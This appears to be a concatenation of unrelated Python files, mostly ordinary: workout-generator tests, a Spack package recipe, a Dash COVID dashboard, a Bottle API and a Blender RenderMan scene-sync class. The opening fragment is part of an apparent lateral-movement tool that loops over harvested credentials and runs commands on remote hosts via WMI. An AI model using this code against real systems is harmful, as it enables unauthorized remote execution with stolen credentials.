creds = [cred for cred in creds if cred[3] in rhost]
print(len(creds))
# Reduce creds if options are given
for username, password, domain, host in creds:
try:
self.output("Execution creds: {}\{}:{}@{}".format(domain, username, password, host))
self.wmi_execute(username, password, domain, host, command)
except Exception as e:
print(str(e))
continue
def module_post(self):
self.stop_webserver()
|
python
|
if __name__ == "__main__":
if __package__ is None:
# add parent dir to allow relative import
from pathlib import Path
import sys
top = Path(__file__).resolve().parents[1]
sys.path.append(str(top))
# PEP 0366
__package__ = "lvscharts"
__import__(__package__)
from lvscharts.cli import cli
cli()
|
python
|
from .toolbar_controller import ToolbarController
|
python
|
from unittest import TestCase
import unittest
from rengine.config import TIME_BASED_CONDITIONS, ExerciseType, MuscleGroup
from rengine.exercises import pick_random_exercise
import dataframe_image as dfi
from rengine.workouts import AutoGeneratedWorkout, BaseWorkout, LowerBodyWorkout, UpperBodyWorkout, dictionary_addition
class TestDictionAdd(TestCase):
def test_add_with_same_keys(self):
dict1 = dict(a = 1, b = 2, c = 56)
dict2 = dict(a = 0.5, b = 20, c = 6)
added_dict = dictionary_addition((dict1, dict2))
self.assertDictEqual(added_dict, dict(a = 1.5, b = 22, c = 62), "Dictionary key value pairs are not adding correctly.")
def test_add_with_different_keys(self):
dict1 = dict(a = 1, b = 2, d = 56)
dict2 = dict(a = 0.5, b = 20, c = 6)
added_dict = dictionary_addition((dict1, dict2))
self.assertDictEqual(added_dict, dict(a = 1.5, b = 22, c = 6, d = 56), "Dictionary key value pairs are not adding correctly when keys are different.")
class TestBaseWorkout(TestCase):
def test_if_workout_has_correct_load(self):
workout = BaseWorkout([
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.BACK], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CALVES], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CALVES], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
])
self.assertDictEqual(workout.load_per_muscle_group, {
MuscleGroup.CALVES:2,
MuscleGroup.CHEST:5,
MuscleGroup.BACK:1,
MuscleGroup.TRICEPS:0,
MuscleGroup.BICEPS:0,
MuscleGroup.DELTOIDS:0,
MuscleGroup.QUAD:0,
MuscleGroup.HAMSTRINGS:0
}, "Workouts load per muscle group not returning correct loads.")
class TestAutoGeneratedWorkout(TestCase):
def test_if_min_muscle_gets_least_worked_muscle_that_is_being_trained(self):
workout1 = AutoGeneratedWorkout(15, [MuscleGroup.CHEST, MuscleGroup.BACK, MuscleGroup.CALVES], exercises= [
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.BACK], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CALVES], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CALVES], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
pick_random_exercise([MuscleGroup.CHEST], ExerciseType.HYPERTROPHY),
])
self.assertEqual(workout1._find_next_muscle_group_to_work(), MuscleGroup.BACK, "AutoGeneratedWorkout is not correctly finding least worked muscle that is trainable.")
workout1.add_exercises([pick_random_exercise([MuscleGroup.BACK], ExerciseType.HYPERTROPHY) for i in range(6)])
self.assertEqual(workout1._find_next_muscle_group_to_work(), MuscleGroup.CHEST, "AutoGeneratedWorkout is not correctly finding least worked muscle that is trainable.")
class TestLowerBodyWorkout(TestCase):
def test_generate(self):
for i in range(15, 121, 15):
workout = LowerBodyWorkout(i,"Barbell Squat")
workout.create()
self.assertGreater(len(workout.workout), 0, "No exercises were generated for this Lower body workout.")
for exercise in workout.workout:
self.assertIn(exercise.muscle_group, MuscleGroup.LOWER_BODY, "Lower body workout has a non-lower body exercise in it.")
self.assertLessEqual(abs(workout.total_time-i), 7.5, f"{i} minute workout is atleast 10 minutes longer or shorter than expected")
tbc = TIME_BASED_CONDITIONS[i]
for muscle, cap in tbc["caps"].items():
exercises_of_muscle = [exercise for exercise in workout.workout if exercise.muscle_group == muscle]
self.assertLessEqual(len(exercises_of_muscle), cap, f"Lower body workout of length {i} is generating {len(exercises_of_muscle)} {muscle} exercises when it should only be generating {cap}.")
def test_muscle_group_cap(self):
for i in range(15, 121, 15):
tbc = TIME_BASED_CONDITIONS[i]
workout = LowerBodyWorkout(i,"Romanian Deadlift")
workout.create()
for muscle, cap in tbc["caps"].items():
exercises_of_muscle = [exercise for exercise in workout.workout if exercise.muscle_group == muscle]
self.assertLessEqual(len(exercises_of_muscle), cap, f"Upper body workout of length {i} is generating {len(exercises_of_muscle)} {muscle} exercises when it should only be generating {cap}.")
def test_buffer_times(self):
for x in range(3):
for i in range(15, 121, 15):
workout = LowerBodyWorkout(i,"Barbell Squat")
workout.create()
self.assertLessEqual(abs(workout.total_time-i), 7.5, f"{i} minute workout is atleast 7.5 minutes longer or shorter than expected")
class TestUpperBodyWorkout(TestCase):
def test_generate(self):
for i in range(15, 121, 15):
workout = UpperBodyWorkout(i,"Barbell Bench Press")
workout.create()
self.assertGreater(len(workout.workout), 0, "No exercises were generated for this upper body workout.")
for exercise in workout.workout:
self.assertIn(exercise.muscle_group, MuscleGroup.UPPER_BODY, "Upper body workout has a non-upper body exercise in it.")
def test_muscle_group_cap(self):
for i in range(15, 121, 15):
tbc = TIME_BASED_CONDITIONS[i]
workout = UpperBodyWorkout(i,"Barbell Bench Press")
workout.create()
for muscle, cap in tbc["caps"].items():
exercises_of_muscle = [exercise for exercise in workout.workout if exercise.muscle_group == muscle]
self.assertLessEqual(len(exercises_of_muscle), cap, f"Lower body workout of length {i} is generating {len(exercises_of_muscle)} {muscle} exercises when it should only be generating {cap}.")
def test_buffer_times(self):
for x in range(3):
for i in range(15, 121, 15):
workout = UpperBodyWorkout(i,"Barbell Bench Press")
workout.create()
self.assertLessEqual(abs(workout.total_time-i), 7.5, f"{i} minute workout is atleast 7.5 minutes longer or shorter than expected")
if __name__ == "__main__":
unittest.main()
|
python
|
from sklearn.linear_model import RidgeClassifierCV, RidgeClassifier
from eye_detector.train.models.find import find_params
from eye_detector.train.models.decorator import ModelDecorator
def ridge(x, y, shape):
grid = RidgeClassifierCV(alphas=[1e-3, 1e-2, 1e-1, 1])
alpha = find_params(grid, x, y, attr="alpha_", best_attr="alpha_")
ridge = RidgeClassifier(alpha=alpha)
return ModelDecorator(ridge)
|
python
|
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
import pandas as pd
import plotly.graph_objects as go
import numpy as np
external_stylesheets = ["https://codepen.io/chriddyp/pen/bWLwgP.css"]
data_url = "https://raw.githubusercontent.com/datasets/covid-19/master/data/countries-aggregated.csv"
data = pd.read_csv(data_url)
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.layout = html.Div(
children=[
html.H1(children="COVID-19 Dashboard"),
dcc.Dropdown(id="coloraxes"),
dcc.Graph(
id="chloropleth",
figure=go.Figure(go.Choropleth(locationmode="country names")),
),
dcc.Slider(
id="Date",
min=0,
max=len(data["Date"].unique()) - 1,
value=0,
marks={
i: {"label": str(date), "style": {"transform": "rotate(45deg)"}}
for i, date in enumerate(data["Date"].unique())
},
step=None,
),
]
)
@app.callback(
Output("chloropleth", "figure"), [Input("Date", "value")], [State("Date", "marks")]
)
def color_graph(date_val, dates):
if date_val is None:
PreventUpdate()
date = dates[str(date_val)]["label"]
fig = go.Figure()
fig.add_choropleth(z=data[data["Date"]==date]["Confirmed"],
locations=data[data["Date"]==date]["Country"],
locationmode="country names"
)
return(fig)
if __name__ == "__main__":
app.run_server()
|
python
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RStatnetCommon(RPackage):
"""Non-statistical utilities used by the software developed by the
Statnet Project. They may also be of use to others."""
homepage = "http://www.statnet.org"
url = "https://cloud.r-project.org/src/contrib/statnet.common_3.3.0.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/statnet.common"
version('4.3.0', sha256='834a3359eac967df0420eee416ae4983e3b502a3de56bb24f494a7ca4104e959')
version('4.2.0', sha256='1176c3303436ebe858d02979cf0a0c33e4e2d1f3637516b4761d573ccd132461')
version('3.3.0', sha256='d714c4e7b0cbf71b7a628af443f5be530e74ad1e21f6b04f1b1087f6d7e40fa4')
depends_on('[email protected]:', when='@4.2.0:', type=('build', 'run'))
depends_on('r-coda', when='@4.1.2:', type=('build', 'run'))
|
python
|
# Grupo: Gabriel Macaúbas Melo, Louise Fernandes Caetano, Maria Eduarda de Almeida Vitorino e Fernando Luiz Castro Seixas
# Importando Funções
from functions import *
# Programa Principal
num = iniciar()
cartelas = criar_cartela(num)
sorteio(cartelas)
|
python
|
import os
from sklearn import datasets
import xgboost as xgb
from xgboost_ray import RayDMatrix, predict
import numpy as np
def main():
if not os.path.exists("simple.xgb"):
raise ValueError(f"Model file not found: `simple.xgb`"
f"\nFIX THIS by running `python `simple.py` first to "
f"train the model.")
# Load dataset
data, labels = datasets.load_breast_cancer(return_X_y=True)
dmat_xgb = xgb.DMatrix(data, labels)
dmat_ray = RayDMatrix(data, labels)
bst = xgb.Booster(model_file="simple.xgb")
pred_xgb = bst.predict(dmat_xgb)
pred_ray = predict(bst, dmat_ray)
np.testing.assert_array_equal(pred_xgb, pred_ray)
print(pred_ray)
if __name__ == "__main__":
main()
|
python
|
# FP involving global variables modified in a different scope
i = 0
def update_i():
global i
i = i + 1
update_i()
if i > 0:
print("i is greater than 0") # FP: This is reachable
|
python
|
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
from functools import wraps
from common import Logging
from common.Logging import get_generic_logger
from common.YamlConfig import AppConfig
from lib.bottle import Bottle, request, response
from ..AppRunner import AppRunner
from ..RemoteServerApi import get_server_config, get_server_info
app = Bottle()
logger = get_generic_logger()
@app.route('/si', method=['GET'])
def si():
try:
return get_server_info()
except Exception as e:
return {'status': e}
@app.route('/cf', method=['GET'])
def si():
try:
return get_server_config()
except Exception as e:
return {'status': e}
@app.route('/rl/:dir/:name', method=['GET'])
def get_rl(dir, name):
try:
return Logging.get_log_content(dir, name)
except Exception as e:
return {'status': e}
def log_to_logger(fn):
@wraps(fn)
def _log_to_logger(*args, **kwargs):
actual_response = fn(*args, **kwargs)
logger.info('%s %s %s %s' % (request.remote_addr, request.method, request.url, response.status))
return actual_response
return _log_to_logger
class WebModule(AppRunner):
name = 'api'
def get_config(self):
conf = {}
conf['host'] = '127.0.0.1'
conf['port'] = 5556
if AppConfig.conf().get('web'):
conf['host'] = AppConfig.conf().get('web').get('host', '127.0.0.1')
conf['port'] = AppConfig.conf().get('web').get('port', 5556)
return conf
def run_app(self):
api_app = Bottle()
api_app.install(log_to_logger)
app.install(log_to_logger)
api_app.mount('/api/', app)
conf = self.get_config()
api_app.config['host'] = conf['host']
api_app.config['port'] = conf['port']
api_app.run(host=api_app.config['host'], port=api_app.config['port'])
if __name__ == '__main__':
app = WebModule()
print(app.name)
app.run()
|
python
|
# utils
from .rfb_utils import object_utils
from .rfb_utils import transform_utils
from .rfb_utils import texture_utils
from .rfb_utils import scene_utils
from .rfb_utils import shadergraph_utils
from .rfb_logger import rfb_log
from .rman_sg_nodes.rman_sg_lightfilter import RmanSgLightFilter
from . import rman_constants
import bpy
class RmanSceneSync(object):
'''
The RmanSceneSync class handles keeping the RmanScene object in sync
during IPR.
Attributes:
rman_render (RmanRender) - pointer back to the current RmanRender object
rman () - rman python module
rman_scene (RmanScene) - pointer to the current RmanScene object
sg_scene (RixSGSCene) - the RenderMan scene graph object
'''
def __init__(self, rman_render=None, rman_scene=None, sg_scene=None):
self.rman_render = rman_render
self.rman = rman_render.rman
self.rman_scene = rman_scene
self.sg_scene = sg_scene
self.new_objects = set() # set of objects that were added to the scene
self.new_cameras = set() # set of new camera objects that were added to the scene
self.update_instances = set() # set of objects we need to update their instances
self.update_particles = set() # set of objects we need to update their particle systemd
self.do_delete = False # whether or not we need to do an object deletion
self.do_add = False # whether or not we need to add an object
self.num_instances_changed = False # if the number of instances has changed since the last update
@property
def sg_scene(self):
return self.__sg_scene
@sg_scene.setter
def sg_scene(self, sg_scene):
self.__sg_scene = sg_scene
def update_view(self, context, depsgraph):
camera = depsgraph.scene.camera
self.rman_scene.context = context
self.rman_scene.depsgraph = depsgraph
self.rman_scene.bl_scene = depsgraph.scene_eval
rman_sg_camera = self.rman_scene.main_camera
translator = self.rman_scene.rman_translators['CAMERA']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
if self.rman_scene.is_viewport_render:
ob = translator.update_viewport_resolution(rman_sg_camera)
if ob:
translator.update_viewport_cam(ob, rman_sg_camera, force_update=True)
translator.update_transform(None, rman_sg_camera)
else:
translator.update_transform(camera, rman_sg_camera)
def _scene_updated(self):
# Check changes to local view
if self.rman_scene.bl_local_view and (self.rman_scene.context.space_data.local_view is None):
self.rman_scene.bl_local_view = False
for ob in self.rman_scene.bl_scene.objects:
if ob.type in ('ARMATURE', 'CURVE', 'CAMERA', 'LIGHT'):
continue
self.clear_instances(ob)
self.update_instances.add(ob.original)
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.check_solo_light()
elif not self.rman_scene.bl_local_view and (self.rman_scene.context.space_data.local_view is not None):
self.rman_scene.bl_local_view = True
for ob in self.rman_scene.bl_scene.objects:
if ob.type in ('ARMATURE', 'CURVE', 'CAMERA', 'LIGHT'):
continue
self.clear_instances(ob)
self.update_instances.add(ob.original)
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
self.rman_scene.check_solo_light()
# Check view_layer
view_layer = self.rman_scene.depsgraph.view_layer
if len(view_layer.objects) != self.rman_scene.num_objects_in_viewlayer:
# objects can be removed from the viewlayer by hiding a collection.
# Figure out the difference using sets and re-emit their instances.
self.rman_scene.num_objects_in_viewlayer = len(view_layer.objects)
view_layer = self.rman_scene.depsgraph.view_layer
set1 = set(self.rman_scene.objects_in_viewlayer)
set2 = set((view_layer.objects))
set_diff1 = set1.difference(set2)
set_diff2 = set2.difference(set1)
objects = list(set_diff1.union(set_diff2))
for o in list(objects):
try:
self.update_instances.add(o.original)
self.clear_instances(o)
self.update_particles.add(o)
self.update_geometry_node_instances(o)
except:
continue
self.rman_scene.objects_in_viewlayer = [o for o in view_layer.objects]
if self.rman_scene.bl_frame_current != self.rman_scene.bl_scene.frame_current:
# frame changed, update any materials and objects that
# are marked as frame sensitive
rfb_log().debug("Frame changed: %d -> %d" % (self.rman_scene.bl_frame_current, self.rman_scene.bl_scene.frame_current))
self.rman_scene.bl_frame_current = self.rman_scene.bl_scene.frame_current
material_translator = self.rman_scene.rman_translators["MATERIAL"]
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
# update frame number
options = self.rman_scene.sg_scene.GetOptions()
options.SetInteger(self.rman.Tokens.Rix.k_Ri_Frame, self.rman_scene.bl_frame_current)
self.rman_scene.sg_scene.SetOptions(options)
for mat in bpy.data.materials:
db_name = object_utils.get_db_name(mat)
rman_sg_material = self.rman_scene.rman_materials.get(mat.original, None)
if rman_sg_material and rman_sg_material.is_frame_sensitive:
material_translator.update(mat, rman_sg_material)
for o in bpy.data.objects:
rman_type = object_utils._detect_primitive_(o)
rman_sg_node = self.rman_scene.rman_objects.get(o.original, None)
if not rman_sg_node:
continue
translator = self.rman_scene.rman_translators.get(rman_type, None)
if translator and rman_sg_node.is_frame_sensitive:
translator.update(o, rman_sg_node)
def _mesh_light_update(self, mat):
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for ob_inst in self.rman_scene.depsgraph.object_instances:
psys = None
if ob_inst.is_instance:
ob = ob_inst.instance_object
group_db_name = object_utils.get_group_db_name(ob_inst)
else:
ob = ob_inst.object
group_db_name = object_utils.get_group_db_name(ob_inst)
if not hasattr(ob.data, 'materials'):
continue
if ob.type in ('ARMATURE', 'CURVE', 'CAMERA'):
continue
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
if rman_sg_node:
found = False
for name, material in ob.data.materials.items():
if name == mat.name:
found = True
if found:
rman_sg_group = rman_sg_node.instances.get(group_db_name, None)
if rman_sg_group:
rman_sg_node.instances.pop(group_db_name)
self.rman_scene.sg_scene.DeleteDagNode(rman_sg_group.sg_node)
self.rman_scene._export_instance(ob_inst)
def _material_updated(self, obj):
mat = obj.id
rman_sg_material = self.rman_scene.rman_materials.get(mat.original, None)
translator = self.rman_scene.rman_translators["MATERIAL"]
db_name = object_utils.get_db_name(mat)
if not rman_sg_material:
# Double check if we can't find the material because of an undo
rman_sg_material = self.update_materials_dict(mat)
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
mat = obj.id
if not rman_sg_material:
rfb_log().debug("New material: %s" % mat.name)
db_name = object_utils.get_db_name(mat)
rman_sg_material = translator.export(mat, db_name)
self.rman_scene.rman_materials[mat.original] = rman_sg_material
else:
rfb_log().debug("Material, call update")
translator.update(mat, rman_sg_material)
# update db_name
rman_sg_material.db_name = db_name
def _light_filter_transform_updated(self, obj):
ob = obj.id
rman_sg_lightfilter = self.rman_scene.rman_objects.get(ob.original, None)
if rman_sg_lightfilter:
rman_group_translator = self.rman_scene.rman_translators['GROUP']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
rman_group_translator.update_transform(ob, rman_sg_lightfilter)
def _gpencil_transform_updated(self, obj):
ob = obj.id
rman_sg_gpencil = self.rman_scene.rman_objects.get(ob.original, None)
if rman_sg_gpencil:
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
rman_group_translator = self.rman_scene.rman_translators['GROUP']
for ob_inst in self.rman_scene.depsgraph.object_instances:
group_db_name = object_utils.get_group_db_name(ob_inst)
rman_sg_group = rman_sg_gpencil.instances.get(group_db_name, None)
if rman_sg_group:
rman_group_translator.update_transform(ob, rman_sg_group)
def _obj_geometry_updated(self, obj):
ob = obj.id
rman_type = object_utils._detect_primitive_(ob)
db_name = object_utils.get_db_name(ob, rman_type=rman_type)
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
if rman_type in ['LIGHT', 'LIGHTFILTER', 'CAMERA']:
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
if rman_type == 'LIGHTFILTER':
self.rman_scene.rman_translators['LIGHTFILTER'].update(ob, rman_sg_node)
for light_ob in rman_sg_node.lights_list:
if isinstance(light_ob, bpy.types.Material):
rman_sg_material = self.rman_scene.rman_materials.get(light_ob.original, None)
if rman_sg_material:
self.rman_scene.rman_translators['MATERIAL'].update_light_filters(light_ob, rman_sg_material)
else:
rman_sg_light = self.rman_scene.rman_objects.get(light_ob.original, None)
if rman_sg_light:
self.rman_scene.rman_translators['LIGHT'].update_light_filters(light_ob, rman_sg_light)
elif rman_type == 'LIGHT':
self.rman_scene.rman_translators['LIGHT'].update(ob, rman_sg_node)
if not self.rman_scene.scene_solo_light:
# only set if a solo light hasn't been set
if not self.rman_scene.check_light_local_view(ob, rman_sg_node):
rman_sg_node.sg_node.SetHidden(ob.data.renderman.mute)
elif rman_type == 'CAMERA':
ob = ob.original
rman_camera_translator = self.rman_scene.rman_translators['CAMERA']
if not self.rman_scene.is_viewport_render:
rman_camera_translator.update(ob, rman_sg_node)
else:
rman_camera_translator.update_viewport_cam(ob, rman_sg_node, force_update=True)
else:
if rman_sg_node.rman_type != rman_type:
# for now, we don't allow the rman_type to be changed
rfb_log().error("Changing primitive type is currently not supported.")
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator = self.rman_scene.rman_translators.get(rman_type, None)
if not translator:
return
translator.update(ob, rman_sg_node)
translator.export_object_primvars(ob, rman_sg_node)
# material slots could have changed, so we need to double
# check that too
for k,v in rman_sg_node.instances.items():
self.rman_scene.attach_material(ob, v)
if rman_sg_node.sg_node:
if not ob.show_instancer_for_viewport:
rman_sg_node.sg_node.SetHidden(1)
else:
rman_sg_node.sg_node.SetHidden(-1)
def update_light_visibility(self, rman_sg_node, ob):
if not self.rman_scene.scene_solo_light:
vis = rman_sg_node.sg_node.GetHidden()
if vis == -1:
vis = 0
result = False
update_instances = False
# if vis is inherit, and none of the other visibility attrs are set to hide
if vis == -1 and not ob.hide_get() and int(ob.renderman.mute) == 0:
update_instances = True
result = False
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
if self.rman_scene.check_light_local_view(ob, rman_sg_node):
update_instances = True
result = True
elif not ob.hide_get():
rman_sg_node.sg_node.SetHidden(ob.renderman.mute)
update_instances = True
result = (vis != int(ob.renderman.mute))
else:
rman_sg_node.sg_node.SetHidden(1)
result = (vis != 1)
if update_instances and len(rman_sg_node.instances) < 1:
self.update_instances.add(ob.original)
return result
def update_object_visibility(self, rman_sg_node, ob):
ob_data = bpy.data.objects.get(ob.name, ob)
rman_type = object_utils._detect_primitive_(ob_data)
particle_systems = getattr(ob_data, 'particle_systems', list())
has_particle_systems = len(particle_systems) > 0
is_hidden = ob_data.hide_get()
# double check hidden value
if rman_type in ['LIGHT']:
if self.update_light_visibility(rman_sg_node, ob):
rfb_log().debug("Update light visibility: %s" % ob.name)
return True
else:
if rman_sg_node.is_hidden != is_hidden:
self.do_delete = False
rman_sg_node.is_hidden = is_hidden
if rman_type == 'EMPTY':
self.update_empty(ob, rman_sg_node)
else:
self.update_instances.add(ob.original)
self.clear_instances(ob, rman_sg_node)
if has_particle_systems:
self.update_particles.add(ob.original)
return True
return False
def update_particle_settings(self, obj, particle_settings_node):
rfb_log().debug("Check %s for particle settings." % obj.id.name)
# A ParticleSettings node was updated. Try to look for it.
ob = obj.id
rman_type = object_utils._detect_primitive_(ob)
for psys in obj.id.particle_systems:
if psys.settings.original == particle_settings_node:
if psys.settings.type == 'FLIP' and rman_type == 'FLUID':
fluid_translator = self.rman_scene.rman_translators['FLUID']
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
fluid_translator.update(ob, rman_sg_node)
return
ob_psys = self.rman_scene.rman_particles.get(obj.id.original, dict())
rman_sg_particles = ob_psys.get(psys.settings.original, None)
if rman_sg_particles:
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
psys_translator = self.rman_scene.rman_translators['PARTICLES']
psys_translator.update(obj.id, psys, rman_sg_particles)
return
# This is a particle instancer. The instanced object needs to updated
elif object_utils.is_particle_instancer(psys):
inst_object = getattr(particle_settings_node, 'instance_object', None)
collection = getattr(particle_settings_node, 'instance_collection', None)
if inst_object:
self.update_instances.add(inst_object.original)
if collection:
for col_obj in collection.all_objects:
if col_obj.original not in self.rman_scene.rman_objects:
self.new_objects.add(col_obj.original)
self.update_instances.add(col_obj.original)
break
# Update any other instance objects this object instanced. The instanced
# object may have changed
rman_sg_node = self.rman_scene.rman_objects.get(obj.id.original, None)
for instance_obj in rman_sg_node.objects_instanced:
self.clear_instances(instance_obj)
self.update_instances.add(instance_obj)
def update_particle_systems(self):
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
for ob in self.update_particles:
rman_type = object_utils._detect_primitive_(ob)
if rman_type not in ['MESH', 'POINTS']:
continue
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
ob_eval = ob.evaluated_get(self.rman_scene.depsgraph)
rfb_log().debug("Update particle systems for: %s" % ob.name)
# any objects that this object instanced, need to update their instances
for instance_obj in rman_sg_node.objects_instanced:
self.clear_instances(instance_obj)
self.update_instances.add(instance_obj)
if rman_sg_node.rman_sg_particle_group_node:
rman_sg_node.rman_sg_particle_group_node.sg_node.RemoveAllChildren()
if len(ob_eval.particle_systems) < 1:
continue
if not rman_sg_node.rman_sg_particle_group_node:
db_name = rman_sg_node.db_name
particles_group_db = ''
rman_sg_node.rman_sg_particle_group_node = self.rman_scene.rman_translators['GROUP'].export(None, particles_group_db)
rman_sg_node.sg_node.AddChild(rman_sg_node.rman_sg_particle_group_node.sg_node)
psys_translator = self.rman_scene.rman_translators['PARTICLES']
for psys in ob_eval.particle_systems:
if object_utils.is_particle_instancer(psys):
# this particle system is a instancer, add the instanced object
# to the self.update_instances list
inst_ob = getattr(psys.settings, 'instance_object', None)
collection = getattr(psys.settings, 'instance_collection', None)
if inst_ob:
self.update_instances.add(inst_ob.original)
rman_instance_sg_node = self.rman_scene.rman_objects.get(inst_ob.original, None)
if rman_instance_sg_node:
self.clear_instances(inst_ob.original, rman_instance_sg_node)
elif collection:
for col_obj in collection.all_objects:
self.update_instances.add(col_obj.original)
rman_instance_sg_node = self.rman_scene.rman_objects.get(col_obj.original, None)
if rman_instance_sg_node:
self.clear_instances(col_obj.original, rman_instance_sg_node)
else:
self.new_objects.add(col_obj.original)
continue
ob_psys = self.rman_scene.rman_particles.get(ob_eval.original, dict())
rman_sg_particles = ob_psys.get(psys.settings.original, None)
if not rman_sg_particles:
psys_db_name = '%s' % psys.name
rman_sg_particles = psys_translator.export(ob, psys, psys_db_name)
if not rman_sg_particles:
continue
psys_translator.update(ob, psys, rman_sg_particles)
ob_psys[psys.settings.original] = rman_sg_particles
self.rman_scene.rman_particles[ob.original] = ob_psys
rman_sg_node.rman_sg_particle_group_node.sg_node.AddChild(rman_sg_particles.sg_node)
def update_empty(self, ob, rman_sg_node=None):
rfb_log().debug("Update empty: %s" % ob.name)
if ob.is_instancer:
collection = ob.instance_collection
if collection:
if self.num_instances_changed:
for col_obj in collection.all_objects:
self.update_instances.add(col_obj.original)
rman_instance_sg_node = self.rman_scene.rman_objects.get(col_obj.original, None)
if rman_instance_sg_node:
self.clear_instances(col_obj.original, rman_instance_sg_node)
else:
self.new_objects.add(col_obj.original)
self.update_particles.add(col_obj)
else:
for col_obj in collection.all_objects:
self.update_instances.add(col_obj.original)
self.update_particles.add(col_obj)
else:
translator = self.rman_scene.rman_translators['EMPTY']
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
translator.export_transform(ob, rman_sg_node.sg_node)
if ob.renderman.export_as_coordsys:
self.rman_scene.get_root_sg_node().AddCoordinateSystem(rman_sg_node.sg_node)
else:
self.rman_scene.get_root_sg_node().RemoveCoordinateSystem(rman_sg_node.sg_node)
def reemit_instances(self):
# update instances
if not self.update_instances:
return
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
# Re-emit instances for all objects in self.update_instances
rfb_log().debug("Re-emit instances")
rman_group_translator = self.rman_scene.rman_translators['GROUP']
for ob_inst in self.rman_scene.depsgraph.object_instances:
parent = None
if ob_inst.is_instance:
ob = ob_inst.instance_object
parent = ob_inst.parent
else:
ob = ob_inst.object
if ob.original not in self.update_instances:
continue
rman_type = object_utils._detect_primitive_(ob)
rman_sg_node = self.rman_scene.rman_objects.get(ob.original, None)
if rman_sg_node:
translator = self.rman_scene.rman_translators.get(rman_type, None)
translator.export_object_primvars(ob, rman_sg_node)
group_db_name = object_utils.get_group_db_name(ob_inst)
rman_sg_group = rman_sg_node.instances.get(group_db_name, None)
if rman_sg_group:
rman_group_translator.update_transform(ob_inst, rman_sg_group)
# object attrs
rman_group_translator.export_object_attributes(ob, rman_sg_group)
if rman_sg_group.bl_psys_settings:
self.rman_scene.attach_particle_material(rman_sg_group.bl_psys_settings, parent, ob, rman_sg_group)
else:
self.rman_scene.attach_material(ob, rman_sg_group)
continue
self.rman_scene._export_instance(ob_inst)
def clear_instances(self, ob, rman_sg_node=None):
rfb_log().debug("Deleting instances")
with self.rman_scene.rman.SGManager.ScopedEdit(self.rman_scene.sg_scene):
if not rman_sg_node:
rman_sg_node = self.rman_scene.rman_objects.get(ob.original)
for k,rman_sg_group in rman_sg_node.instances.items():
if ob.parent and object_utils._detect_primitive_(ob.parent) == 'EMPTY':
rman_empty_node = self.rman_scene.rman_objects.get(ob.parent.original)
rman_empty_node.sg_node.RemoveChild(rman_sg_group.sg_node)
else:
self.rman_scene.get_root_sg_node().RemoveChild(rman_sg_group.sg_node)
rman_sg_node.instances.clear()
def update_materials_dict(self, mat):
# See comment below in update_objects_dict
rman_sg_material = None
for id, rman_sg_node in self.rman_scene.rman_materials.items():
if rman_sg_node:
db_name = object_utils.get_db_name(mat)
if rman_sg_node.db_name == db_name:
self.rman_scene.rman_materials[mat.original] = rman_sg_node
del self.rman_scene.rman_materials[id]
rman_sg_material = rman_sg_node
break
return rman_sg_material
def update_objects_dict(self, ob, rman_type=None):
# Try to see if we already have an obj with the same db_name
# We need to do this because undo/redo causes all bpy.types.ID
# references to be invalidated (see: https://docs.blender.org/api/current/info_gotcha.html)
# We don't want to accidentally mistake this for a new object, so we need to update
# our objects dictionary with the new bpy.types.ID reference
rman_sg_node = None
for id, rsn in self.rman_scene.rman_objects.items():
if rsn:
db_name = object_utils.get_db_name(ob, rman_type=rman_type)
if rsn.db_name == db_name:
self.rman_scene.rman_objects[ob.original] = rsn
del self.rman_scene.rman_objects[id]
if id in self.rman_scene.rman_cameras:
self.rman_scene.rman_cameras[ob.original] = rsn
del self.rman_scene.rman_cameras[id]
